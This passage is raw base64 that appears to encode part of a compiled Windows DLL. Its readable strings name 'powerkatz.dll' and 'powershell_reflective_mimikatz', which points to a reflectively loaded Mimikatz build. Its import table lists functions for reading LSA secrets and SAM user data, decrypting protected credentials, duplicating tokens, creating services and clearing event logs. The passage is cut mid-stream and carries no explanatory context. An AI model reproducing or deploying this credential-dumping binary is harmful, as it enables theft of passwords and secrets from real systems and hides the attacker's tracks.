AGAEsAAzwCtAIcAdgBlAAAAENBAANNAwADZIGUAEcCwAcNCkAHAEgABDwDuAM0ArACHAHYAZQAAABFwkAFwEUAAvwCeAHwAVwBGADMAJQAAABFggAFjQXABbyDPAK4AhwB2AGUAEIAQAIQgAAARIIABJUCwASNAoAElIO4AxwC2ABCQEACeIAAAESBgASdAsAEjQKABJyC1ABDAQADDQKAAxyCHABEgYAEjQUABLyCHAHYAZQAQkCAAmyAlABEggAEjQOABJyDvAM4ApwCWAIUAEcCgAcdBUAHGQUABxUEwAcNBIAHPIV4AETCAATVAsAEzQKABNSD+ANcAxgARQIABRkEAAUNA8AFJIQ8A7gDHABBgIABpICMAELAwALARoABDAAAAESBgASdBEAEjQQABLSC1ABFQgAFWQTABU0EgAV0g7gDHALUAEQBAAQNBIAEPIGUAERBgAR8gfgBXAEYAMwAlABFQgAFWQTABU0EAAVsg7gDHALUAENBAANNAoADXIGUAEbCQAbAR4AD/AN4AvQCcAHYAYwBVAAAAEeCwAeZC0AHjQsAB4BJgAS8BDgDtAMcAtQAAABIgwAIsQXACJ0FgAiZBUAIjQUACLyGPAW4BRQAQYCAAayAjABFQgAFWQSABU0EQAVsg7gDHALUAEZCgAZZBYAGTQVABnSEvAQ4A7ADHALUAETCAATVA4AEzQNABNyD/AN4AtwAR4LAB5kHwAeNB4AHgEYABLwEOAOwAxwC1AAAAEkCQAk5CwAJGQrACQ0KgAkASgAGVAAAAEUBwAUNBgAFAEUAAhwB2AGUAAAARIFABI0LAASASoABlAAAAEPAwAPARIABFAAAAEYCQAYNC4AGAEoAAzgCsAIcAdgBlAAAAEXCgAXNBEAF3IQ8A7gDNAKwAhwB2AGUAEYBgAYZAkAGDQIABhSFHABFQgAFWQSABU0EQAVsg7wDHALUAEbCgAbdA4AG2QNABs0DAAbchTwEuAQUAEXCQAXZBgAF1QXABc0FgAXARQAEHAAAAEaCQAaZBkAGlQYABo0FgAaARQAE3AAAAEfCwAfdBwAH2QbAB80GgAfARYAFPAS4BBQAAABGwkAG3QcABtkGwAbNBoAGwEYABBQAAABFwgAF3QSABdkEQAXNBAAF9IQUAEfDAAfxBMAH3QSAB9kEQAfNBAAH7IY8BbgFFABIQsAITQkACEBHAAV8BPgEdAPwA1wDGALUAAAASAKACA0FgAgshnwF+AV0BPAEXAQYA9QARQIABRkEAAUVA8AFDQOABSyEHABFwcAF3QlABc0JAAXASIAC1AAAAEZCgAZ5AsAGXQKABlkCQAZNAgAGVIV8AEXBwAXZBgAFzQXABcBFAAMUAAAARMGABN0DwATNA4AE7IMUBEVCAAVdAkAFWQHABU0BgAVMhHgSIcGAAEAAACncgYANHMGAAiDCAAAAAAAEQ8GAA9kCAAPNAYADzILcEiHBgABAAAAznMGAOxzBgAfgwgAAAAAAAkaBgAaNA8AGnIW4BRwE2BIhwYAAQAAAFF0BgD7dAYAO4MIAPt0BgAJBAEABCIAAEiHBgABAAAAN3gGAMJ4BgBxgwgAwngGAAECAQACUAAAAQ0EAA00CQANMgZQARUFABU0ugAVAbgABlAAAAESBgASdAgAEjQHABIyC1ABAAAAAQ8GAA9kBQAPNAQADxILcAAAAAABAAAAAAAAAAEAAAAAAAAAAQcCAAcBmwABAAAAAQAAAAEAAAABCQIACTIFMBkyCwAhZKsAITSoACEBogAS8BDgDsAMcAtQAADAewgAAAUAABkrDAAcZBEAHFQQABw0DwAcchjwFuAU0BLAEHDAewgAOAAAABkkBwASZKIAEjShABIBngALcAAAwHsIAOAEAAABEAYAEHQOABA0DQAQkgzgGSwJABs0qAAbAaIADPAK4AhwB2AGUAAAwHsIAAAFAAABIgoAInQJACJkCAAiVAcAIjQGACIyHuABDwQAD3QCAAo0AQARDwQADzQGAA8yC3BIhwYAAQAAAKKSBgCskgYAiYMIAAAAAAABCgQACjQNAAqSBnAZHgYAD2QOAA80DQAPkgtwwHsIAEAAAAARDwQADzQHAA8yC3BIhwYAAQAAAAjPBgASzwYA14MIAAAAAAARFAgAFGQOABQ0DAAUchDwDuAMcEiHBgACAAAAZs4GAKzOBgCkgwgAAAAAACnOBgC6zgYAvoMIAAAAAAARDwQADzQHAA8yC3BIhwYAAQAAAPbPBgAA0AYA14MIAAAAAAABDwYAD+QDAAp0AgAFNAEAERUIABV0CwAVZAoAFTQJABVSEeBIhwYAAQAAAOnRBgD/0QYA74MIAAAAAAABHwsAH3QiAB9kIQAfNCAAHwEcABTwEuAQUAAAGS0LAB90KAAfZCcAHzQmAB8BIgAU8BLgEFAAAMB7CAAAAQAAAVkOAFn0QwBR5EQAScRGAEFURwA2NEgADgFJAAdwBmAhCAIACNRFAJA+BwD5PwcARBgMACEAAACQPgcA+T8HAEQYDAAZMAsAHzR4AR8BbgEQ8A7gDNAKwAhwB2AGUAAAwHsIAGALAAABFAgAFGQNABRUDAAUNAsAFHIQcAEfDAAfdBEAH2QQAB80DgAfchjwFuAU0BLAEFABDAQADDQMAAxyCHAZHwUADTRtAA0BaAAGcAAAwHsIADADAAABHQkAHcIW8BTgEtAQwA5wDWAMMAtQAAABDAIADHIIMAEQBAAQNAoAEHIMcAEYCAAYZA0AGFQLABg0CgAYchRwARwKABxkDwAcVA0AHDQMABxyGPAW4BRwAQAAAAEcDAAcZBMAHFQSABw0EAAckhjwFuAU0BLAEHABHw0AH2QdAB9UHAAfNBoAHwEUABjwFuAU0BLAEHAAAAENAgANkgZQGRkKABnkCQAZdAgAGWQHABk0BgAZMhXwSIcGAAIAAACvgwcADYQHABqECABMhAcAk4MHAFKEBwA1hAgAAAAAAAETCAATNAwAE1IM8ArgCHAHYAZQAQ8GAA9UCwAPNAoAD3ILYAESAgAScgtQAQsBAAtiAAARDwQADzQGAA8yC3BIhwYAAQAAAGWMBwBvjAcAa4QIAAAAAAARHAoAHGQPABw0DgAcchjwFuAU0BLAEHBIhwYAAQAAAK6MBwACjgcAToQIAAAAAAAJBgIABjICMEiHBgABAAAAfJIHAImSBwABAAAAiZIHABkuCQAdZMQAHTTDAB0BvgAO4AxwC1AAAMB7CADgBQAAARIGABJkEwASNBEAEtILUAEVBgAVZBAAFTQOABWyEXABDwIABjICUAEJAgAJkgJQAQkCAAlyAlARDwQADzQGAA8yC3BIhwYAAQAAAHWhBwCFoQcAa4QIAAAAAAARDwQADzQGAA8yC3BIhwYAAQAAAC2hBwBDoQcAa4QIAAAAAAARDwQADzQGAA8yC3BIhwYAAQAAAM2gBwD9oAcAa4QIAAAAAAARDwQADzQGAA8yC3BIhwYAAQAAALWhBwDDoQcAa4QIAAAAAAAZHAMADgEYAAJQAADAewgAsAAAAAEZCgAZdA8AGWQOABlUDQAZNAwAGZIV8AEdDAAddBUAHWQUAB1UEwAdNBIAHdIZ8BfgFcABFQgAFWQOABVUDQAVNAwAFZIR4BkhCAASVA4AEjQNABJyDuAMcAtgwHsIADAAAAARBgIABjICcEiHBgABAAAAybUHAN+1BwCFhAgAAAAAABEGAgAGMgIwSIcGAAEAAADqtwcAAbgHAJ6ECAAAAAAAARwLABx0FwAcZBYAHFQVABw0FAAcARIAFeAAAAEFAgAFdAEAEQoEAAo0CAAKUgZwSIcGAAEAAADywQcAccIHANGECAAAAAAAAQgBAAhiAAARDwQADzQGAA8yC3BIhwYAAQAAAKHDBwD8wwcAt4QIAAAAAAARGwoAG2QMABs0CwAbMhfwFeAT0BHAD3BIhwYAAQAAAMLKBwDyygcAPYUIAAAAAAABFwoAFzQXABeyEPAO4AzQCsAIcAdgBlAZKAoAGjQYABryEPAO4AzQCsAIcAdgBlDAewgAcAAAABktCQAbVJACGzSOAhsBigIO4AxwC2AAAMB7CABAFAAAGTELAB9UlgIfNJQCHwGOAhLwEOAOwAxwC2AAAMB7CABgFAAAEQ8EAA80BgAPMgtwSIcGAAEAAAAxzgcAcc4HALeECAAAAAAAEQYCAAYyAjBIhwYAAQAAAADQBwAu0AcA0YQIAAAAAAARGQoAGXQMABlkCwAZNAoAGVIV8BPgEcBIhwYAAQAAAEPUBwAk1QcAnoQIAAAAAAARFQgAFXQKABVkCQAVNAgAFVIR8EiHBgABAAAApNIHAPHSBwCehAgAAAAAAAEUCAAUZA8AFFQNABQ0DAAUkhBwGSgIABrkFQAadBQAGmQTABryEFDAewgAcAAAAAEUBgAUNBAAFJINcAxgC1AZJwtFGTQXABVDENIM8ArgCNAGwARwA2ACUAAAwHsIAGAAAAABHAoAHDQUAByyFfAT4BHQD8ANcAxgC1AZJQkAEzQ5ABMBMAAM8ArgCHAHYAZQAADAewgAcAEAABEKBAAKNAcACjIGcEiHBgABAAAA1gIIADQDCADqhAgAAAAAABklCgAWVBEAFjQQABZyEvAQ4A7ADHALYMB7CAA4AAAAGSsHABp09AAaNPMAGgHwAAtQAADAewgAcAcAABEPBAAPNAYADzILcEiHBgABAAAAkfsHAJr7BwBrhAgAAAAAAAEYCgAYNBAAGFIU8BLgENAOwAxwC2AKUBEGAgAGMgIwSIcGAAEAAABODQgAZA0IAAOFCAAAAAAAAQcBAAdCAAAREAcAEIIM8ArQCMAGcAVgBDAAAEiHBgABAAAAHw8IABkQCAAZhQgAAAAAAAEGAgAGMgJQEQ8EAA80BgAPMgtwSIcGAAEAAACODQgApA0IAGuECAAAAAAAAQ8GAA9kEQAPNBAAD9ILcBktDVUfdBQAG2QTABc0EgATUw6yCvAI4AbQBMACUAAAwHsIAFgAAAARCgQACjQGAAoyBnBIhwYAAQAAAO8YCAAFGQgAhYQIAAAAAAAZLQoAHAH7AA3wC+AJ0AfABXAEYAMwAlDAewgAwAcAAAEXBgAXZAkAFzQIABcyE3ABGAYAGGQJABg0CAAYMhRwARgGABhUBwAYNAYAGDIUYBktDTUfdBQAG2QTABc0EgATMw6yCvAI4AbQBMACUAAAwHsIAFAAAAARGwoAG2QMABs0CwAbMhfwFeAT0BHAD3BIhwYAAQAAADM4CABkOAgAPYUIAAAAAAABCQEACWIAAAEjCwAjdB8AIzQeACMBGAAY8BbgFNASwBBQAAARCgQACjQMAAqSBnBIhwYAAQAAAJs7CAC/OwgAVIUIAAAAAAABEggAElQMABI0CgASUg7gDHALYAEdDAAddBEAHWQQAB1UDwAdNA4AHZIZ8BfgFcARBAEABEIAAEiHBgABAAAAq08IAMFPCACnhQgAAAAAAAEMBQAMggVwBGADMAJQAAABEwgAEzQMABNSDOAK0AhwB2AGUBkkBwASZCsAEjQqABIBKAALcAAAwHsIADABAAAZHwUADQGIAAbgBMACUAAAwHsIAAAEAAAhKAoAKPSDACDUhAAYdIUAEGSGAAg0hwCgUAgA+1AIAHwhDAAhAAAAoFAIAPtQCAB8IQwAARcGABdUCwAXMhPwEeAPcCEVBgAVxAoADWQJAAU0CADQTwgA508IAMghDAAhAAAA0E8IAOdPCADIIQwAGRMBAASiAADAewgAQAAAAAAAAAABCgMACmgCAASiAAABGQoAGTQWABmyFfAT4BHQD8ANcAxgC1ABGQkAGWIV8BPgEdAPwA1wDGALUAowAAABEQkAEWIN8AvgCdAHwAVwBGADUAIwAAAJGQoAGXQLABlkCgAZNAkAGTIV8BPgEcBIhwYAAQAAACZsCAAvbAgA2YUIAC9sCAAAAAAAAQQBAAQCAAARGQoAGeQLABl0CgAZZAkAGTQIABlSFfBIhwYAAgAAAChuCAC3bggAwIUIAAAAAADFbggA2m4IAMCFCAAAAAAAAQYCAAZSAlABDwYAD2QPAA80DgAPsgtwGScLVRlTFAERAA3wC+AJ0AfABXAEYAMwAlAAAMB7CAB4AAAAGSYJABhoDgAUAR4ACeAHcAZgBTAEUAAAwHsIANAAAAABBgIABhICMAELAwALaAUAB8IAAAEbCAAbdAkAG2QIABs0BwAbMhRQCQ8GAA9kCQAPNAgADzILcEiHBgABAAAAenoIAIF6CADZhQgAgXoIAAkKBAAKNAYACjIGcEiHBgABAAAATXsIAIB7CAAQhggAgHsIAAEAAAABCgQACjQNAApyBnABCAQACHIEcANgAjAAAAAAAQQBAAQSAAABAAAAAAAAAAAAAAAAAAAAAAAAAE8DJVgAAAAAIiQMAAEAAAABAAAAAQAAABgkDAAcJAwAICQMAECHBAAwJAwAAABwb3dlcmthdHouZGxsAHBvd2Vyc2hlbGxfcmVmbGVjdGl2ZV9taW1pa2F0egAA4CUMAAAAAAAAAAAACjkMAACQCAB4KAwAAAAAAAAAAAA2OwwAmJIIAEAxDAAAAAAAAAAAAKI7DABgmwgAEC4MAAAAAAAAAAAA1DsMADCYCAB4MgwAAAAAAAAAAAAaPAwAmJwIACguDAAAAAAAAAAAACQ8DABImAgASC4MAAAAAAAAAAAAzD0MAGiYCAC4LwwAAAAAAAAAAAA2PgwA2JkIANguDAAAAAAAAAAAAABADAD4mAgA6C8MAAAAAAAAAAAAxEAMAAiaCACoLwwAAAAAAAAAAADmQAwAyJkIACgwDAAAAAAAAAAAABxBDABImggAICkMAAAAAAAAAAAAkkEMAECTCACALwwAAAAAAAAAAAAUQgwAoJkIAPAwDAAAAAAAAAAAANxCDAAQmwgAQDAMAAAAAAAAAAAA6kIMAGCaCACYMQwAAAAAAAAAAACiRQwAuJsIAHgxDAAAAAAAAAAAAAJGDACYmwgAUCkMAAAAAAAAAAAAsE4MAHCTCAAAAAAAAAAAAAAAAAAAAAAAAAAAAJgyDAAAAAAArjIMAAAAAAC8MgwAAAAAANAyDAAAAAAA5DIMAAAAAAD2MgwAAAAAAAozDAAAAAAAHjMMAAAAAAAyMwwAAAAAAEIzDAAAAAAAVDMMAAAAAABmMwwAAAAAAHYzDAAAAAAAijMMAAAAAACeMwwAAAAAAK4zDAAAAAAAxjMMAAAAAADaMwwAAAAAAPIzDAAAAAAABDQMAAAAAAAUNAwAAAAAAB40DAAAAAAAKjQMAAAAAAA6NAwAAAAAAFY0DAAAAAAAbDQMAAAAAACENAwAAAAAAJ40DAAAAAAAsjQMAAAAAADCNAwAAAAAANI0DAAAAAAA5DQMAAAAAAD0NAwAAAAAAAg1DAAAAAAAFjUMAAAAAAAqNQwAAAAAAEI1DAAAAAAAUjUMAAAAAABiNQwAAAAAAHQ1DAAAAAAAhDUMAAAAAACWNQwAAAAAAKw1DAAAAAAAxjUMAAAAAADWNQwAAAAAAOw1DAAAAAAAAjYMAAAAAAAWNgwAAAAAACo2DAAAAAAARDYMAAAAAABUNgwAAAAAAGg2DAAAAAAAgjYMAAAAAACYNgwAAAAAAKo2DAAAAAAAujYMAAAAAADMNgwAAAAAAOo2DAAAAAAACDcMAAAAAAAkNwwAAAAAAC43DAAAAAAASjcMAAAAAABmNwwAAAAAAHg3DAAAAAAAjDcMAAAAAACmNwwAAAAAALY3DAAAAAAA2DcMAAAAAADqNwwAAAAAAP43DAAAAAAAEjgMAAAAAAAoOAwAAAAAADw4DAAAAAAAVjgMAAAAAAB2OAwAAAAAAI44DAAAAAAAnDgMAAAAAACuOAwAAAAAAMI4DAAAAAAA2jgMAAAAAADsOAwAAAAAAPg4DAAAAAAAAAAAAAAAAAAYOQwAAAAAADw5DAAAAAAAWjkMAAAAAABsOQwAAAAAAIQ5DAAAAAAAqDkMAAAAAAC4OQwAAAAAAM45DAAAAAAA5jkMAAAAAAD+OQwAAAAAABI6DAAAAAAANjoMAAAAAABSOgwAAAAAAGg6DAAAAAAAjDoMAAAAAACsOgwAAAAAAMo6DAAAAAAA3joMAAAAAAD8OgwAAAAAABI7DAAAAAAAAAAAAAAAAABsQQwAAAAAAFRBDAAAAAAAOkEMAAAAAAAoQQwAAAAAAHxBDAAAAAAAAAAAAAAAAACoUAwAAAAAAI5QDAAAAAAAglAMAAAAAAB2UAwAAAAAAGRQDAAAAAAAVFAMAAAAAABAUAwAAAAAAC5QDAAAAAAAHlAMAAAAAAAMUAwAAAAAAPxPDAAAAAAA7E8MAAAAAADaTwwAAAAAAMxPDAAAAAAAwk8MAAAAAACsTwwAAAAAAJZPDAAAAAAAgk8MAAAAAAB0TwwAAAAAAGJPDAAAAAAAUE8MAAAAAAA+TwwAAAAAADRPDAAAAAAAJk8MAAAAAAAYTwwAAAAAAAxPDAAAAAAA5E4MAAAAAADMTgwAAAAAAMJQDAAAAAAAlE4MAAAAAACCTgwAAAAAAGRODAAAAAAASE4MAAAAAAA0TgwAAAAAACBODAAAAAAABk4MAAAAAADyTQwAAAAAANxNDAAAAAAAxk0MAAAAAACyTQwAAAAAAJZNDAAAAAAAfk0MAAAAAABgTQwAAAAAAEZNDAAAAAAANk0MAAAAAAAYTQwAAAAAAARNDAAAAAAA9kwMAAAAAADkTAwAAAAAANRMDAAAAAAAxEwMAAAAAACqTAwAAAAAAJhMDAAAAAAAiEwMAAAAAABuTAwAAAAAAFZMDAAAAAAAREwMAAAAAAAuTAwAAAAAABZMDAAAAAAACEwMAAAAAAD6SwwAAAAAAORLDAAAAAAA1ksMAAAAAADcUAwAAAAAAPBQDAAAAAAAvk4MAAAAAAAAUQwAAAAAAMhLDAAAAAAAuksMAAAAAACuSwwAAAAAAJ5LDAAAAAAAkEsMAAAAAACCSwwAAAAAAHRLDAAAAAAAZEsMAAAAAABMSwwAAAAAAD5LDAAAAAAALEsMAAAAAAAWSwwAAAAAAP5KDAAAAAAA6EoMAAAAAADUSgwAAAAAAMJKDAAAAAAAskoMAAAAAACcSgwAAAAAAJBKDAAAAAAAgEoMAAAAAABwSgwAAAAAAGBKDAAAAAAAUEoMAAAAAAAQUQwAAAAAAEBKDAAAAAAAMEoMAAAAAAAcSgwAAAAAAABKDAAAAAAA6EkMAAAAAADcSQwAAAAAAMZJDAAAAAAAskkMAAAAAACeSQwAAAAAAIZJDAAAAAAAekkMAAAAAABsSQwAAAAAAFJJDAAAAAAAQEkMAAAAAAAuSQwAAAAAABhJDAAAAAAABkkMAAAAAADsSAwAAAAAANZIDAAAAAAAwEgMAAAAAACwSAwAAAAAAJ5IDAAAAAAAjkgMAAAAAAB+SAwAAAAAAGhIDAAAAAAAVkgMAAAAAABESAwAAAAAADRIDAAAAAAAJEgMAAAAAAAQSAwAAAAAAP5HDAAAAAAA6kcMAAAAAADYRwwAAAAAAMhHDAAAAAAAukcMAAAAAACoRwwAAAAAAJJHDAAAAAAAgEcMAAAAAAByRwwAAAAAAGBHDAAAAAAATEcMAAAAAAA4RwwAAAAAACBHDAAAAAAACkcMAAAAAAAQRgwAAAAAAChGDAAAAAAANEYMAAAAAABARgwAAAAAAE5GDAAAAAAAXEYMAAAAAABkRgwAAAAAAHRGDAAAAAAAhkYMAAAAAACURgwAAAAAAKRGDAAAAAAAsEYMAAAAAADCRgwAAAAAANJGDAAAAAAA4kYMAAAAAAD+RgwAAAAAAAAAAAAAAAAAsDsMAAAAAADAOwwAAAAAAAAAAAAAAAAAAgAAAAAAAIAGAAAAAAAAgAgAAAAAAACAAAAAAAAAAACyPAwAAAAAADI8DAAAAAAASDwMAAAAAABoPAwAAAAAAIQ8DAAAAAAAoDwMAAAAAADCPAwAAAAAAOY8DAAAAAAACj0MAAAAAAAcPQwAAAAAADg9DAAAAAAATD0MAAAAAABgPQwAAAAAAHI9DAAAAAAAij0MAAAAAACsPQwAAAAAAL49DAAAAAAAAAAAAAAAAAAqPwwAAAAAAEg/DAAAAAAAVj8MAAAAAABmPwwAAAAAAH4/DAAAAAAAnD8MAAAAAAC6PwwAAAAAAEI+DAAAAAAA0j8MAAAAAADqPwwAAAAAAHg+DAAAAAAAiD4MAAAAAACWPgwAAAAAAK4+DAAAAAAAvD4MAAAAAADOPgwAAAAAAAg/DAAAAAAA+D4MAAAAAADePgwAAAAAAF4+DAAAAAAAAAAAAAAAAADwQQwAAAAAANhBDAAAAAAAukEMAAAAAACaQQwAAAAAAAAAAAAAAAAA0EAMAAAAAAAAAAAAAAAAAOg9DAAAAAAA/D0MAAAAAAAOPgwAAAAAACI+DAAAAAAA2D0MAAAAAAAAAAAAAAAAAAxADAAAAAAAIEAMAAAAAAA6QAwAAAAAAFBADAAAAAAAbEAMAAAAAACMQAwAAAAAAK5ADAAAAAAAAAAAAAAAAADyQAwAAAAAAAhBDAAAAAAAAAAAAAAAAACOAAAAAAAAgCkAAAAAAACAhQAAAAAAAIBNAAAAAAAAgJMAAAAAAACATwAAAAAAAIAkAAAAAAAAgBsAAAAAAACADQAAAAAAAIAaAAAAAAAAgH8AAAAAAACA0AAAAAAAAICRAAAAAAAAgJ0AAAAAAACApwAAAAAAAIA1AQAAAAAAgDABAAAAAACALQEAAAAAAIA2AAAAAAAAgDYBAAAAAACASQAAAAAAAIAAAAAAAAAAACJCDAAAAAAANkIMAAAAAABWQgwAAAAAAGhCDAAAAAAAfkIMAAAAAACWQgwAAAAAAKhCDAAAAAAAukIMAAAAAADMQgwAAAAAAAAAAAAAAAAAVjsMAAAAAABgOwwAAAAAAGw7DAAAAAAAeDsMAAAAAACKOwwAAAAAAEI7DAAAAAAAAAAAAAAAAADiRQwAAAAAAMZFDAAAAAAArEUMAAAAAAAAAAAAAAAAAPBDDAAAAAAADEQMAAAAAAAgRAwAAAAAADZEDAAAAAAASkQMAAAAAABeRAwAAAAAANRDDAAAAAAAmkQMAAAAAAC0RAwAAAAAANREDAAAAAAA5kQMAAAAAAD8RAwAAAAAABJFDAAAAAAAJkUMAAAAAABGRQwAAAAAAGhFDAAAAAAAkEUMAAAAAAD2QgwAAAAAAApDDAAAAAAAKkMMAAAAAABCQwwAAAAAAMBDDAAAAAAAnkMMAAAAAACOQwwAAAAAAHZDDAAAAAAAXkMMAAAAAAB4RAwAAAAAAAAAAAAAAAAACDwMAAAAAAD2OwwAAAAAAOI7DAAAAAAAAAAAAAAAAADLAENyeXB0UmVsZWFzZUNvbnRleHQAwABDcnlwdEdlbktleQDGAENyeXB0R2V0UHJvdlBhcmFtAMQAQ3J5cHRHZXRIYXNoUGFyYW0AygBDcnlwdEltcG9ydEtleQAAzQBDcnlwdFNldEtleVBhcmFtAAC2AENyeXB0RGVzdHJveUhhc2gAAMwAQ3J5cHRTZXRIYXNoUGFyYW0AyABDcnlwdEhhc2hEYXRhALMAQ3J5cHRDcmVhdGVIYXNoAL8AQ3J5cHRFeHBvcnRLZXkAALQAQ3J5cHREZWNyeXB0AADUAlN5c3RlbUZ1bmN0aW9uMDA3ALkAQ3J5cHREdXBsaWNhdGVLZXkAugBDcnlwdEVuY3J5cHQAALEAQ3J5cHRBY3F1aXJlQ29udGV4dFcAAMUAQ3J5cHRHZXRLZXlQYXJhbQAAsABDcnlwdEFjcXVpcmVDb250ZXh0QQAAtwBDcnlwdERlc3Ryb3lLZXkANgFHZXRMZW5ndGhTaWQAAHYAQ29weVNpZACdAUxzYUNsb3NlAAC9AUxzYU9wZW5Qb2xpY3kAxQFMc2FRdWVyeUluZm9ybWF0aW9uUG9saWN5AIMAQ3JlYXRlV2VsbEtub3duU2lkAAB8AENyZWF0ZVByb2Nlc3NBc1VzZXJXAAB9AENyZWF0ZVByb2Nlc3NXaXRoTG9nb25XAG4CUmVnUXVlcnlWYWx1ZUV4VwAAUgJSZWdFbnVtVmFsdWVXAGECUmVnT3BlbktleUV4VwB+AlJlZ1NldFZhbHVlRXhXAABPAlJlZ0VudW1LZXlFeFcAaAJSZWdRdWVyeUluZm9LZXlXAAAwAlJlZ0Nsb3NlS2V5AO0CU3lzdGVtRnVuY3Rpb24wMzIAKQJRdWVyeVNlcnZpY2VTdGF0dXNFeAAA+wFPcGVuU2VydmljZVcAAMkCU3RhcnRTZXJ2aWNlVwBcAENvbnRyb2xTZXJ2aWNlAADaAERlbGV0ZVNlcnZpY2UA+QFPcGVuU0NNYW5hZ2VyVwAAVwBDbG9zZVNlcnZpY2VIYW5kbGUAAGwAQ29udmVydFNpZFRvU3RyaW5nU2lkVwAAgAFJc1RleHRVbmljb2RlAFoBR2V0VG9rZW5JbmZvcm1hdGlvbgCPAUxvb2t1cEFjY291bnROYW1lVwAAkQFMb29rdXBBY2NvdW50U2lkVwD3AU9wZW5Qcm9jZXNzVG9rZW4AAHQAQ29udmVydFN0cmluZ1NpZFRvU2lkVwAAqwFMc2FGcmVlTWVtb3J5ANMCU3lzdGVtRnVuY3Rpb24wMDYAvABDcnlwdEVudW1Qcm92aWRlclR5cGVzVwC+AENyeXB0RW51bVByb3ZpZGVyc1cAxwBDcnlwdEdldFVzZXJLZXkA9gFPcGVuRXZlbnRMb2dXAFMAQ2xlYXJFdmVudExvZ1cAAEMBR2V0TnVtYmVyT2ZFdmVudExvZ1JlY29yZHMAACcCUXVlcnlTZXJ2aWNlT2JqZWN0U2VjdXJpdHkAAEMAQnVpbGRTZWN1cml0eURlc2NyaXB0b3JXAAAgAUZyZWVTaWQAvwJTZXRTZXJ2aWNlT2JqZWN0U2VjdXJpdHkAACAAQWxsb2NhdGVBbmRJbml0aWFsaXplU2lkAACBAENyZWF0ZVNlcnZpY2VXAADmAlN5c3RlbUZ1bmN0aW9uMDI1AMwBTHNhUmV0cmlldmVQcml2YXRlRGF0YQAAvwFMc2FPcGVuU2VjcmV0AMkBTHNhUXVlcnlUcnVzdGVkRG9tYWluSW5mb0J5TmFtZQDGAUxzYVF1ZXJ5U2VjcmV0AADOAlN5c3RlbUZ1bmN0aW9uMDAxANICU3lzdGVtRnVuY3Rpb24wMDUAVwFHZXRTaWRTdWJBdXRob3JpdHkAANoCU3lzdGVtRnVuY3Rpb24wMTMAWAFHZXRTaWRTdWJBdXRob3JpdHlDb3VudACqAUxzYUVudW1lcmF0ZVRydXN0ZWREb21haW5zRXgAAJcBTG9va3VwUHJpdmlsZWdlVmFsdWVXAIYBSXNWYWxpZFNpZAAA/AFPcGVuVGhyZWFkVG9rZW4A3wBEdXBsaWNhdGVUb2tlbkV4AABRAENoZWNrVG9rZW5NZW1iZXJzaGlwAADBAlNldFRocmVhZFRva2VuAACMAENyZWRGcmVlAACJAENyZWRFbnVtZXJhdGVXAABBRFZBUEkzMi5kbGwAAAgAQ2VydEFkZEVuY29kZWRDZXJ0aWZpY2F0ZVRvU3RvcmUAAEAAQ2VydEZyZWVDZXJ0aWZpY2F0ZUNvbnRleHQAABIAQ2VydENsb3NlU3RvcmUAABABUEZYRXhwb3J0Q2VydFN0b3JlRXgAAGoAQ2VydFNldENlcnRpZmljYXRlQ29udGV4dFByb3BlcnR5AFcAQ2VydE9wZW5TdG9yZQDWAENyeXB0VW5wcm90ZWN0RGF0YQAAewBDcnlwdEJpbmFyeVRvU3RyaW5nVwAA1ABDcnlwdFN0cmluZ1RvQmluYXJ5VwAAugBDcnlwdFByb3RlY3REYXRhAAB5AENyeXB0QWNxdWlyZUNlcnRpZmljYXRlUHJpdmF0ZUtleQCLAENyeXB0RXhwb3J0UHVibGljS2V5SW5mbwAALwBDZXJ0RW51bVN5c3RlbVN0b3JlAAQAQ2VydEFkZENlcnRpZmljYXRlQ29udGV4dFRvU3RvcmUAAM4AQ3J5cHRTaWduQW5kRW5jb2RlQ2VydGlmaWNhdGUALABDZXJ0RW51bUNlcnRpZmljYXRlc0luU3RvcmUAhABDcnlwdEVuY29kZU9iamVjdAA1AENlcnRGaW5kQ2VydGlmaWNhdGVJblN0b3JlAABLAENlcnRHZXROYW1lU3RyaW5nVwAARgBDZXJ0R2V0Q2VydGlmaWNhdGVDb250ZXh0UHJvcGVydHkAQ1JZUFQzMi5kbGwABgBDRExvY2F0ZUNoZWNrU3VtAAAMAE1ENUluaXQADQBNRDVVcGRhdGUACwBNRDVGaW5hbAAABQBDRExvY2F0ZUNTeXN0ZW0ABABDREdlbmVyYXRlUmFuZG9tQml0cwAAY3J5cHRkbGwuZGxsAAAQAERzR2V0RGNOYW1lVwAAZQBOZXRBcGlCdWZmZXJGcmVlAABORVRBUEkzMi5kbGwAABQAQ29DcmVhdGVJbnN0YW5jZQAAcABDb1VuaW5pdGlhbGl6ZQAAQwBDb0luaXRpYWxpemVFeAAAb2xlMzIuZGxsAE9MRUFVVDMyLmRsbAAAeQFScGNCaW5kaW5nU2V0T3B0aW9uAGcBUnBjQmluZGluZ0Zyb21TdHJpbmdCaW5kaW5nVwAA9gFScGNTdHJpbmdCaW5kaW5nQ29tcG9zZVcAAHYBUnBjQmluZGluZ1NldEF1dGhJbmZvRXhXAAD6AVJwY1N0cmluZ0ZyZWVXAAB6AE1lc0hhbmRsZUZyZWUAeQBNZXNFbmNvZGVJbmNyZW1lbnRhbEhhbmRsZUNyZWF0ZQAAdgBNZXNEZWNvZGVJbmNyZW1lbnRhbEhhbmRsZUNyZWF0ZQAAZQFScGNCaW5kaW5nRnJlZQAAewBNZXNJbmNyZW1lbnRhbEhhbmRsZVJlc2V0APoATmRyTWVzVHlwZUVuY29kZTIA9wBOZHJNZXNUeXBlRGVjb2RlMgD8AE5kck1lc1R5cGVGcmVlMgD0AE5kck1lc1R5cGVBbGlnblNpemUyAAAgAElfUnBjQmluZGluZ0lucVNlY3VyaXR5Q29udGV4dAAAlQBOZHJDbGllbnRDYWxsMgAAAwJVdWlkQ3JlYXRlAABSUENSVDQuZGxsAAA6AFBhdGhDb21iaW5lVwAAOABQYXRoQ2Fub25pY2FsaXplVwBlAFBhdGhJc1JlbGF0aXZlVwBJAFBhdGhGaW5kRmlsZU5hbWVXAFsAUGF0aElzRGlyZWN0b3J5VwAAU0hMV0FQSS5kbGwAEwBTYW1FbnVtZXJhdGVVc2Vyc0luRG9tYWluAB0AU2FtTG9va3VwTmFtZXNJbkRvbWFpbgAAHwBTYW1PcGVuRG9tYWluACEAU2FtT3BlblVzZXIAHABTYW1Mb29rdXBJZHNJbkRvbWFpbgAABwBTYW1Db25uZWN0AAAGAFNhbUNsb3NlSGFuZGxlAAAUAFNhbUZyZWVNZW1vcnkAJgBTYW1RdWVyeUluZm9ybWF0aW9uVXNlcgAgAFNhbU9wZW5Hcm91cAAAEQBTYW1FbnVtZXJhdGVEb21haW5zSW5TYW1TZXJ2ZXIAABAAU2FtRW51bWVyYXRlQWxpYXNlc0luRG9tYWluACwAU2FtUmlkVG9TaWQAHgBTYW1P